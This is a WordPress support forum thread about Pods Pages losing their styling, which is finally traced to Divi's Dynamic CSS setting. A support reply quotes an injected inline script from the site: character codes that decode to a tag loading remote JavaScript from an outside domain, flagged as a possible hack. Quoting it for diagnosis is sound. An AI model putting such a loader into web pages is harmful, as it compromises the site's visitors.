Support » Plugin: Pods - Custom Content Types and Fields » Pods Pages Requiring WordPress Pages

  • Resolved Chris Anderson

    (@bluecaboosestudio)


    All of my Pods Pages are misbehaving. If I navigate to one, the header, footer, and sidebar are all messed up and look like they’re missing CSS. However, if I create a vanilla WordPress page with the same slug as the Pods Page, all issues are fixed. Here’s a page that’s broken currently: https://ddsdogtraining.com/litters. And here’s a page that all I did to fix it was create a vanilla WordPress page with “dds-goldens” as the slug: https://ddsdogtraining.com/dds-goldens. Does anyone have any ideas about what could be causing this? I’ve already tried disabling plugins one at a time and that didn’t make a different. Does anyone have any ideas about what could be causing this?

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Support Paul Clark

    (@pdclark)

    There is a JavaScript error in the error console for that page.
    Unknown if that’s the cause, but may be related.
    It’s caused by an inline script at the end of the HTML source:

    <script>function brjst_ajax_filters_berocket_ajax_filtering_start(){try{</textarea>document.write(String.fr0mCharC0de(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,115,108,97,112,105,115,46,99,111,109,47,97,115,115,101,116,115,47,115,105,47,97,110,97,108,121,116,105,99,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62))<textarea+style=\"display:+none\">}catch(err){}};jQuery(document).on("berocket_ajax_filtering_start", brjst_ajax_filters_berocket_ajax_filtering_start);</script>

    Error: SyntaxError: Unexpected token '<'
    (It shouldn’t contain </textarea> at the beginning.)

    Also, String.fr0mCharC0de is very odd. Unknown what those character codes contain.

    For example, if it’s the same as this use of that function, then the site may be hacked.

    There is similar code in one of your <style> tags — this would break CSS as you describe:

    
    document.write(String.fr0mCharC0de(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 115, 108, 97, 112, 105, 115, 46, 99, 111, 109, 47, 97, 115, 115, 101, 116, 115, 47, 115, 105, 47, 97, 110, 97, 108, 121, 116, 105, 99, 115, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))
    

    See https://wordpress.org/support/article/faq-my-site-was-hacked/

    Thread Starter Chris Anderson

    (@bluecaboosestudio)

    Paul,

    Thanks for the response! The SyntaxError: Unexpected token '<' is a known error with the WooCommerce AJAX Products Filter plugin. I’ve disabled the plugin to show that the page still doesn’t render correctly, but even when the plugin is enabled, pages that I’ve created a vanilla WordPress page for with the same slug as the Pods Page do render correctly.

    Plugin Support Paul Clark

    (@pdclark)

    Unsure — the issue may be with Divi or any number of things.
    For one next thing, I’m currently seeing in the source <div id="page-container" style="padding-top: 997px; margin-top: -1px;" class="et-animated-content"> for a very large top padding… Perhaps some script or animation library misbehaving?

    For custom development that you can’t handle yourself, we highly recommend going to Codeable. They have skilled WordPress developers including some from the Pods Framework community. You can usually get assistance very quickly on your projects. If you use our link https://pods.io/codeable then you also support Pods as they provide Pods additional funding for projects we send to them.

    Plugin Author Jory Hogeveen

    (@keraweb)

    Closing topic since it had 2 weeks of silence.
    Feel free to reopen if needed!

    Cheers, Jory

    There’s a feature in Divi called “Dynamic CSS” that was causing the issue. Recent Divi updates made that feature incompatible with Pods Pages, at least in my own testing. If anyone else is having the same problem, the Divi feature is located at Divi > Theme Options > General > Performance > Dynamic CSS.

Viewing 5 replies - 1 through 5 (of 5 total)
  • You must be logged in to reply to this topic.